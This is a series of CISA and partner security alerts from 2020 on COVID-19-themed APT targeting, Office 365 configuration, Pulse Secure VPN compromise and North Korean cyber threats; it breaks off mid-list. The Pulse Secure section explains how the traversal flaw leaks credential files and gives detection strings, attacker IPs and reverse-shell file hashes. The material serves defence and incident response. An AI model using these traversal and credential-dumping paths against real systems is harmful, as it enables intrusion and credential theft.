
Original release date: May 5, 2020


This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).

CISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. It describes some of the methods these actors are using to target organizations and provides mitigation advice.

The joint CISA-NCSC Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA’s joint COVID-19 Alerts with NCSC, see the following guide.

COVID-19-related targeting

APT actors are actively targeting organizations involved in both national and international COVID-19 responses. These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.

APT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.

The pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy, or acquire sensitive data on COVID-19-related research.

Targeting of pharmaceutical and research organizations

CISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.

These organizations’ global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.

Recently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[1],[2] and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[3],[4]

COVID-19-related password spraying activity

CISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. These actors are using this type of attack to target healthcare entities in a number of countries—including the United Kingdom and the United States—as well as international healthcare organizations.

Previously, APT groups have used password spraying to target a range of organizations and companies across sectors—including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.

Technical Details

Password spraying is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.

Malicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. The actors will then “spray” the identified accounts with lists of commonly used passwords.

Once the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.

In previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization’s Global Address List (GAL). The actors then used the GAL to password spray further accounts.

NCSC has previously provided examples of frequently found passwords, which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.

CISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.


CISA and NCSC have previously published information for organizations on password spraying and improving password policy. Putting this into practice will significantly reduce the chance of compromise from this kind of attack.

CISA’s Cyber Essentials for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT professionals to put that culture into action. Additionally, the UK government’s Cyber Aware campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.

A number of other mitigations will be of use in defending against the campaigns detailed in this report:

Contact Information

CISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing

The NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website:


This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times.

CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA.



  • May 5, 2020: Initial Version

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Original release date: April 29, 2020


As organizations adapt or change their enterprise collaboration capabilities to meet “telework” requirements, many organizations are migrating to Microsoft Office 365 (O365) and other cloud collaboration services. Due to the speed of these deployments, organizations may not be fully considering the security configurations of these platforms.

This Alert is an update to the Cybersecurity and Infrastructure Security Agency’s May 2019 Analysis Report, AR19-133A: Microsoft Office 365 Security Observations, and reiterates the recommendations related to O365 for organizations to review and ensure their newly adopted environment is configured to protect, detect, and respond against would be attackers of O365.

Technical Details

Since October 2018, the Cybersecurity and Infrastructure Security Agency (CISA) has conducted several engagements with customers who have migrated to cloud-based collaboration solutions like O365. In recent weeks, organizations have been forced to change their collaboration methods to support a full “work from home” workforce.

O365 provides cloud-based email capabilities, as well as chat and video capabilities using Microsoft Teams. While the abrupt shift to work-from-home may necessitate rapid deployment of cloud collaboration services, such as O365, hasty deployment can lead to oversights in security configurations and undermine a sound O365-specific security strategy.

CISA continues to see instances where entities are not implementing best security practices in regard to their O365 implementation, resulting in increased vulnerability to adversary attacks.


The following list contains recommended configurations when deploying O365:

Enable multi-factor authentication for administrator accounts: Azure Active Directory (AD) Global Administrators in an O365 environment have the highest level of administrator privileges at the tenant level. This is equivalent to the Domain Administrator in an on-premises AD environment. The Azure AD Global Administrators are the first accounts created so that administrators can begin configuring their tenant and eventually migrate their users. Multi-factor authentication (MFA) is not enabled by default for these accounts. Microsoft has moved towards a “Secure by default” model, but even this must be enabled by the customer. The new feature, called “Security Defaults,”[1] assists with enforcing administrators’ usage of MFA. These accounts are internet accessible because they are hosted in the cloud. If not immediately secured, an attacker can compromise these cloud-based accounts and maintain persistence as a customer migrates users to O365.

Assign Administrator roles using Role-based Access Control (RBAC): Given its high level of default privilege, you should only use the Global Administrator account when absolutely necessary. Instead, using Azure AD’s numerous other built-in administrator roles instead of the Global Administrator account can limit assigning of overly permissive privileges to legitimate administrators.[2] Practicing the principle of “Least Privilege” can greatly reduce the impact if an administrator account is compromised.[3] Always assign administrators only the minimum permissions they need to do conduct their tasks.  

Enable Unified Audit Log (UAL): O365 has a logging capability called the Unified Audit Log that contains events from Exchange Online, SharePoint Online, OneDrive, Azure AD, Microsoft Teams, PowerBI, and other O365 services.[4] An administrator must enable the Unified Audit Log in the Security and Compliance Center before queries can be run. Enabling UAL allows administrators the ability to investigate and search for actions within O365 that could be potentially malicious or not within organizational policy.

Enable multi-factor authentication for all users: Though normal users in an O365 environment do not have elevated permissions, they still have access to data that could be harmful to an organization if accessed by an unauthorized entity. Also, threat actors compromise normal user accounts in order to send phishing emails and attack other organizations using the apps and services the compromised user has access to.

Disable legacy protocol authentication when appropriate: Azure AD is the authentication method that O365 uses to authenticate with Exchange Online, which provides email services. There are a number of legacy protocols associated with Exchange Online that do not support MFA features. These protocols include Post Office Protocol (POP3), Internet Message Access Protocol (IMAP), and Simple Mail Transport Protocol (SMTP). Legacy protocols are often used with older email clients, which do not support modern authentication. Legacy protocols can be disabled at the tenant level or at the user level. However, should an organization require older email clients as a business necessity, these protocols will presumably not be disabled. This leaves email accounts accessible through the internet with only the username and password as the primary authentication method. One approach to mitigate this issue is to inventory users who still require the use of a legacy email client and legacy email protocols and only grant access to those protocols for those select users. Using Azure AD Conditional Access policies can help limit the number of users who have the ability to use legacy protocol authentication methods. Taking this step will greatly reduce an organization’s attack surface.[5]

Enable alerts for suspicious activity: Enabling logging of activity within an Azure/0365 environment can greatly increase the owner’s effectiveness of identifying malicious activity occurring within their environment and enabling alerts will serve to enhance that. Creating and enabling alerts within the Security and Compliance Center to notify administrators of abnormal events will reduce the time needed to effectively identify and mitigate malicious activity.[6] At a minimum, CISA recommends enabling alerts for logins from suspicious locations and for accounts exceeding sent email thresholds.

Incorporate Microsoft Secure Score: Microsoft provides a built-in tool to measure an organization’s security posture with respect to its O365 services and offer enhancement recommendations.[7] These recommendations provided by Microsoft Secure Score do NOT encompass all possible security configurations, but organizations should still consider using Microsoft Secure Score because O365 service offerings frequently change. Using Microsoft Secure Score will help provide organizations a centralized dashboard for tracking and prioritizing security and compliance changes within O365.

Integrate Logs with your existing SIEM tool: Even with robust logging enabled via the UAL, it is critical to integrate and correlate your O365 logs with your other log management and monitoring solutions. This will ensure that you can detect anomalous activity in your environment and correlate it with any potential anomalous activity in O365.[8]

Solution Summary

CISA encourages organizations to implement an organizational cloud strategy to protect their infrastructure assets by defending against attacks related to their O365 transition and better securing O365 services.[9] Specifically, CISA recommends that administrators implement the following mitigations and best practices:

  • Use multi-factor authentication. This is the best mitigation technique to protect against credential theft for O365 administrators and users.
  • Protect Global Admins from compromise and use the principle of “Least Privilege.”
  • Enable unified audit logging in the Security and Compliance Center.
  • Enable Alerting capabilities.
  • Integrate with organizational SIEM solutions.
  • Disable legacy email protocols, if not required, or limit their use to specific users.




  • April 29, 2020: Initial Version

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Original release date: April 16, 2020


Note: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques and mitigations.

This Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability, which advised organizations to immediately patch CVE-2019-11510—an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[1] CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization’s credentials will still be able to access—and move laterally through—that organization’s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.

This Alert provides new detection methods for this activity, including a CISA-developed tool that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.

For a downloadable copy of IOCs, see STIX file.


CISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510—an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances—to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[2] CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.

Technical Details

CISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining Initial Access [TA0001] to a victim organization’s network via VPN appliances. Cyber threat actors used these Valid Accounts [T1078] in conjunction with:

  • External Remote Services [T1133] for access,
  • Remote Services [T1021] for Lateral Movement [TA0008] to move quickly throughout victim network environments, and
  • Data Encrypted for Impact [T1486 ] for impact, as well as
  • Exfiltration [TA0010] and sale of the data.

Initial Access

CVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains dana/html5/acc.[3],[4] For example, a malicious cyber actor can obtain the contents of /etc/passwd [5] by requesting the following uniform resource identifier (URI):


Obtaining the contents of /etc/passwd gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on Github. An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[6],[7],[8]

Open-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[9] however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for Credential Dumping [T1003] plaintext passwords from the VPN appliance.

Test Environment

To confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)

Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials

CISA’s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.

CISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.

  • Local Pulse Secure Admin account
    • Username: admin; Password: pulse-local-password
  • Domain Administrator Account
    • Username: Administrator; Password: domain-admin-password1
  • CISA-test-user Account
    • Username: cisa-test-user; Password: Use_s3cure_passwords

After creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)

Figure 2: VPN appliance joined to the domain without caching the domain administrator password

CISA used a similar file inclusion to test the ability to Credential Dump [T1003] the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.

Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials

Next, CISA validated the ability to Credential Dump [T1003] a user password from the VPN appliance. To do this, CISA created a user realm (Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. (Note: the path to stored credentials is publicly available.)[10]

Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials

This test confirmed CISA’s suspicion that threat actors had access to each of the various compromised environments.

Cyber Threat Actor Behavior in Victim Network Environments

CISA observed—once credentials were compromised—cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used Connection Proxies [T1090 ]—such as Tor infrastructure and virtual private servers (VPSs)—to minimize the chance of detection when they connected to victim VPN appliances.

Using traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim’s environment:

  • Creating persistence via scheduled tasks/remote access trojans
  • Amassing files for exfiltration
  • Executing ransomware on the victim’s network environment

By correlating these actions with the connection times and user accounts recorded in the victim’s Pulse Secure .access logs, CISA was able to identify unauthorized threat actor connections to the victim’s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.

In one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.

In other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim’s network environment if they lost their primary connection.

Initial Detection

Conventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services. 

An intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer’s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.

Post-Compromise Detection and IOC Detection Tool

Given that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.

To detect past exploitation of CVE-2019-11510, network administrators should:

  1. Turn on unauthenticated log requests (see figure 5). (Note: there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.)

    Figure 5: Checkbox that enables logging exploit attacks


  2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as ../../../data (see figure 6).

    Figure 6: Strings for detection of lateral movement


  3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.
  4. Run CISA’s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit CISA’s GitHub page to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.

Indicators of Compromise

CISA observed IP addresses making unauthorized connections to customer infrastructure. (Note: these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.

CISA observed the following user agents with this activity:

  • Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
  • Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
  • Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36

CISA also observed:

  • A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application whitelisting or antivirus (AV) protections. See table 1 for hashes of files used.
  • A threat actor “living off the land” and utilizing C:PythonArcGIS to house malicious PE files, as well as using natively installed Python.
  • A threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088
Table 1: Filenames and hashes of files used by a threat actor
Filename MD5   (tied to scheduled task, python meterpreter reverse shell port 9090) 5669b1fa6bd8082ffe306aa6e597d7f5 (tied to scheduled task, python meterpreter reverse shell port 8088) 61eebf58e892038db22a4d7c2ee65579


For a downloadable copy of IOCs, see STIX file.



CISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If—after applying the detection measures in this alert—organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.

CISA also recommends organizations to:

  • Look for unauthorized applications and scheduled tasks in their environment.
  • Remove any remote access programs not approved by the organization.
  • Remove any remote access trojans.
  • Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.

If organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying back into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.

Contact Information

Recipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at



  • April 16, 2020: Initial Version

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Original release date: April 15, 2020


The U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation are issuing this advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The advisory highlights the cyber threat posed by North Korea – formally known as the Democratic People’s Republic of Korea (DPRK) – and provides recommended steps to mitigate the threat. In particular, Annex 1 lists U.S. government resources related to DPRK cyber threats and Annex 2 includes a link to the UN 1718 Sanctions Committee (DPRK) Panel of Experts reports.

The DPRK’s malicious cyber activities threaten the United States and the broader international community and, in particular, pose a significant threat to the integrity and stability of the international financial system. Under the pressure of robust U.S. and UN sanctions, the DPRK has increasingly relied on illicit activities – including cybercrime – to generate revenue for its weapons of mass destruction and ballistic missile programs. In particular, the United States is deeply concerned about North Korea’s malicious cyber activities, which the U.S. government refers to as HIDDEN COBRA. The DPRK has the capability to conduct disruptive or destructive cyber activities affecting U.S. critical infrastructure. The DPRK also uses cyber capabilities to steal from financial institutions, and has demonstrated a pattern of disruptive and harmful cyber activity that is wholly inconsistent with the growing international consensus on what constitutes responsible State behavior in cyberspace. 

The United States works closely with like-minded countries to focus attention on and condemn the DPRK’s disruptive, destructive, or otherwise destabilizing behavior in cyberspace. For example, in December 2017, Australia, Canada, New Zealand, the United States, and the United Kingdom publicly attributed the WannaCry 2.0 ransomware attack to the DPRK and denounced the DPRK’s harmful and irresponsible cyber activity. Denmark and Japan issued supporting statements for the joint denunciation of the destructive WannaCry 2.0 ransomware attack, which affected hundreds of thousands of computers around the world in May 2017. 

It is vital for the international community, network defenders, and the public to stay vigilant and to work together to mitigate the cyber threat posed by North Korea. 

Click here for a PDF version of this report.

Technical Details

DPRK’s Malicious Cyber Activities Targeting the Financial Sector

Many DPRK cyber actors are subordinate to UN- and U.S.-designated entities, such as the Reconnaissance General Bureau. DPRK state-sponsored cyber actors primarily consist of hackers, cryptologists, and software developers who conduct espionage, cyber-enabled theft targeting financial institutions and digital currency exchanges, and politically-motivated operations against foreign media companies. They develop and deploy a wide range of malware tools around the world to enable these activities and have grown increasingly sophisticated. Common tactics to raise revenue illicitly by DPRK state-sponsored cyber actors include, but are not limited to:

Cyber-Enabled Financial Theft and Money Laundering. The UN Security Council 1718 Committee Panel of Experts’ 2019 mid-term report (2019 POE mid-term report) states that the DPRK is increasingly able to generate revenue notwithstanding UN Security Council sanctions by using malicious cyber activities to steal from financial institutions through increasingly sophisticated tools and tactics. The 2019 POE mid-term report notes that, in some cases, these malicious cyber activities have also extended to laundering funds through multiple jurisdictions. The 2019 POE mid-term report mentions that it was investigating dozens of suspected DPRK cyber-enabled heists and that, as of late 2019, the DPRK has attempted to steal as much as $2 billion through these illicit cyber activities. Allegations in a March 2020 Department of Justice forfeiture complaint are consistent with portions of the POE’s findings. Specifically, the forfeiture complaint alleged how North Korean cyber actors used North Korean infrastructure in furtherance of their conspiracy to hack digital currency exchanges, steal hundreds of millions of dollars in digital currency, and launder the funds.

Extortion Campaigns. DPRK cyber actors have also conducted extortion campaigns against third-country entities by compromising an entity’s network and threatening to shut it down unless the entity pays a ransom. In some instances, DPRK cyber actors have demanded payment from victims under the guise of long-term paid consulting arrangements in order to ensure that no such future malicious cyber activity takes place. DPRK cyber actors have also been paid to hack websites and extort targets for third-party clients.

Cryptojacking. The 2019 POE mid-term report states that the POE is also investigating the DPRK’s use of “cryptojacking,” a scheme to compromise a victim machine and steal its computing resources to mine digital currency. The POE has identified several incidents in which computers infected with cryptojacking malware sent the mined assets – much of it anonymity-enhanced digital currency (sometimes also referred to as “privacy coins”) – to servers located in the DPRK, including at Kim Il Sung University in Pyongyang.

These activities highlight the DPRK’s use of cyber-enabled means to generate revenue while mitigating the impact of sanctions and show that any country can be exposed to and exploited by the DPRK. According to the 2019 POE mid-term report, the POE is also investigating such activities as attempted violations of UN Security Council sanctions on the DPRK.

Cyber Operations Publicly Attributed to DPRK by U.S. Government

The DPRK has repeatedly targeted U.S. and other government and military networks, as well as networks related to private entities and critical infrastructure, to steal data and conduct disruptive and destructive cyber activities. To date, the U.S. government has publicly attributed the following cyber incidents to DPRK state-sponsored cyber actors and co-conspirators:

  • Sony Pictures. In November 2014, DPRK state-sponsored cyber actors allegedly launched a cyber attack on Sony Pictures Entertainment (SPE) in retaliation for the 2014 film “The Interview.” DPRK cyber actors hacked into SPE’s network to steal confidential data, threatened SPE executives and employees, and damaged thousands of computers. 
  • Bangladesh Bank Heist. In February 2016, DPRK state-sponsored cyber actors allegedly attempted to steal at least $1 billion from financial institutions across the world and allegedly stole $81 million from the Bangladesh Bank through unauthorized transactions on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) network. According to the complaint, DPRK cyber actors accessed the Bangladesh Bank’s computer terminals that interfaced with the SWIFT network after compromising the bank’s computer network via spear phishing emails targeting bank employees. DPRK cyber actors then sent fraudulently authenticated SWIFT messages directing the Federal Reserve Bank of New York to transfer funds out of the Bangladesh Bank’s Federal Reserve account to accounts controlled by the conspirators.
  • WannaCry 2.0. DPRK state-sponsored cyber actors developed the ransomware known as WannaCry 2.0, as well as two prior versions of the ransomware. In May 2017, WannaCry 2.0 ransomware infected hundreds of thousands of computers in hospitals, schools, businesses, and homes in over 150 countries.  WannaCry 2.0 ransomware encrypts an infected computer’s data and allows the cyber actors to demand ransom payments in the Bitcoin digital currency. The Department of the Treasury designated one North Korean computer programmer for his part in the WannaCry 2.0 conspiracy, as well as his role in the Sony Pictures cyber attack and Bangladesh Bank heist, and additionally designated the organization he worked for.
  • FASTCash Campaign. Since late 2016, DPRK state-sponsored cyber actors have employed a fraudulent ATM cash withdrawal scheme known as “FASTCash” to steal tens of millions of dollars from ATMs in Asia and Africa.  FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. In one incident in 2017, DPRK cyber actors enabled the withdrawal of cash simultaneously from ATMs located in more than 30 different countries. In another incident in 2018, DPRK cyber actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries. 
  • Digital Currency Exchange Hack. As detailed in allegations set forth in a Department of Justice complaint for forfeiture in rem, in April 2018, DPRK state-sponsored cyber actors hacked into a digital currency exchange and stole nearly $250 million worth of digital currency. The complaint further described how the stolen assets were laundered through hundreds of automated digital currency transactions, to obfuscate the origins of the funds, in an attempt to prevent law enforcement from tracing the assets. Two Chinese nationals are alleged in the complaint to have subsequently laundered the assets on behalf of the North Korean group, receiving approximately $91 million from DPRK-controlled accounts, as well as an additional $9.5 million from a hack of another exchange. In March 2020, the Department of the Treasury designated the two individuals under cyber and DPRK sanctions authorities, concurrent with a Department of Justice announcement that the individuals had been previously indicted on money laundering and unlicensed money transmitting charges and that 113 digital currency accounts were subject to forfeiture.


Measures to Counter the DPRK Cyber Threat

North Korea targets cyber-enabled infrastructure globally to generate revenue for its regime priorities, including its weapons of mass destruction programs. We strongly urge governments, industry, civil society, and individuals to take all relevant actions below to protect themselves from and counter the DPRK cyber threat:

  • Raise Awareness of the DPRK Cyber Threat. Highlighting the gravity, scope, and variety of malicious cyber activities carried out by the DPRK will raise general awareness across the public and private sectors of the threat and promote adoption and implementation of appropriate preventive and risk mitigation measures.
  • Share Technical Information of the DPRK Cyber Threat. Information sharing at both the national and international levels to detect and defend against the DPRK cyber threat will enable enhanced cybersecurity of networks and systems.  Best practices should be shared with governments and the private sector.  Under the provisions of the Cybersecurity Information Sharing Act of 2015 (6 U.S.C. §§ 1501–1510), non-federal entities may share cyber threat indicators and defensive measures related to HIDDEN COBRA with federal and non-federal entities.
  • Implement and Promote Cybersecurity Best Practices. Adopting measures – both technical and behavioral – to enhance cybersecurity will make U.S. and global cyber infrastructure more secure and resilient. Financial institutions, including money services businesses, should take independent steps to protect against malicious DPRK cyber activities. Such steps may include, but are not limited to, sharing threat information through government and/or industry channels, segmenting networks to minimize risks, maintaining regular backup copies of data, undertaking awareness training on common social engineering tactics, implementing policies governing information sharing and network access, and developing cyber incident response plans. The Department of Energy’s Cybersecurity Capability Maturity Model and the National Institute of Standards and Technology’s Cybersecurity Framework provide guidance on developing and implementing robust cybersecurity practices. As shown in Annex I, the Cybersecurity and Infrastructure Security Agency (CISA) provides extensive resources, including technical alerts and malware analysis reports, to enable network defenders to identify and reduce exposure to malicious cyber activities.
  • Notify Law Enforcement. If an organization suspects that it has been the victim of malicious cyber activity, emanating from the DPRK or otherwise, it is critical to notify law enforcement in a timely fashion.  This not only can expedite the investigation, but also, in the event of a financial crime, can increase the chances of recovering any stolen assets.
    U.S. law enforcement has seized millions of dollars’ worth of digital currency stolen by North Korean cyber actors.  All types of financial institutions, including money services businesses, are encouraged to cooperate on the front end by complying with U.S. law enforcement requests for information regarding these cyber threats, and on the back end by identifying forfeitable assets upon receipt of a request from U.S. law enforcement or U.S. court orders, and by cooperating with U.S. law enforcement to support the seizure of such assets.
  • Strengthen Anti-Money Laundering (AML) / Countering the Financing of Terrorism (CFT) / Counter-Proliferation Financing (CPF) Compliance.  Countries should swiftly and effectively implement the Financial Action Task Force (FATF) standards on AML/CFT/CPF.  This includes ensuring financial institutions and other covered entities employ risk mitigation measures in line with the FATF standards and FATF public statements and guidance.  Specifically, the FATF has called for all countries to apply countermeasures to protect the international financial system from the ongoing money laundering, terrorist financing, and proliferation financing risks emanating from the DPRK.[1]  This includes advising all financial institutions and other covered entities to give special attention to business relationships and transactions with the DPRK, including DPRK companies, financial institutions, and those acting on their behalf.  In line with UN Security Council Resolution 2270 Operative Paragraph 33, Member States should close existing branches, subsidiaries, and representative offices of DPRK banks within their territories and terminate correspondent relationships with DPRK banks.
    Further, in June 2019, FATF amended its standards to require all countries regulate and supervise digital asset service providers, including digital currency exchanges, and mitigate against risks when engaging in digital currency transactions. Digital asset service providers should remain alert to changes in customers’ activities, as their business may be used to facilitate money laundering, terrorist financing, and proliferation financing. The United States is particularly concerned about platforms that provide anonymous payment and account service functionality without transaction monitoring, suspicious activity reporting, and customer due diligence, among other obligations.
    U.S. financial institutions, including foreign-located digital asset service providers doing business in whole or substantial part in the United States, and other covered businesses and persons should ensure that they comply with their regulatory obligations under the Bank Secrecy Act (as implemented through the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) regulations in 31 CFR Chapter X).  For financial institutions, these obligations include  developing and maintaining effective anti-money laundering programs that are reasonably designed to prevent the money services business from being used to facilitate money laundering and the financing of terrorist activities, as well as identifying and reporting suspicious transactions, including those conducted, affected, or facilitated by cyber events or illicit finance involving digital assets, in suspicious activity reporting to FinCEN.

International Cooperation

To counter the DPRK’s malicious cyber activities, the United States regularly engages with countries around the world to raise awareness of the DPRK cyber threat by sharing information and evidence via diplomatic, military, law enforcement and judicial, network defense, and other channels.  To hamper the DPRK’s efforts to steal funds through cyber means and to defend against the DPRK’s malicious cyber activities, the United States strongly urges countries to strengthen network defense, shutter DPRK joint ventures in third countries, and expel foreign-located North Korean information technology (IT) workers in a manner consistent with applicable international law.  A 2017 UN Security Council resolution required all Member States to repatriate DPRK nationals earning income abroad, including IT workers, by December 22, 2019.  The United States also seeks to enhance the capacity of foreign governments and the private sector to understand, identify, defend against, investigate, prosecute, and respond to DPRK cyber threats and participate in international efforts to help ensure the stability of cyberspace. 

Consequences of Engaging in Prohibited or Sanctionable Conduct

Individuals and entities engaged in or supporting DPRK cyber-related activity, including processing related financial transactions, should be aware of the potential consequences of engaging in prohibited or sanctionable conduct.

The Department of the Treasury’s Office of Foreign Assets Control (OFAC) has the authority to impose sanctions on any person determined to have, among other things:

  • Engaged in significant activities undermining cybersecurity on behalf of the Government of North Korea or the Workers’ Party of Korea;
  • Operated in the information technology (IT) industry in North Korea;
  • Engaged in certain other malicious cyber-enabled activities; or
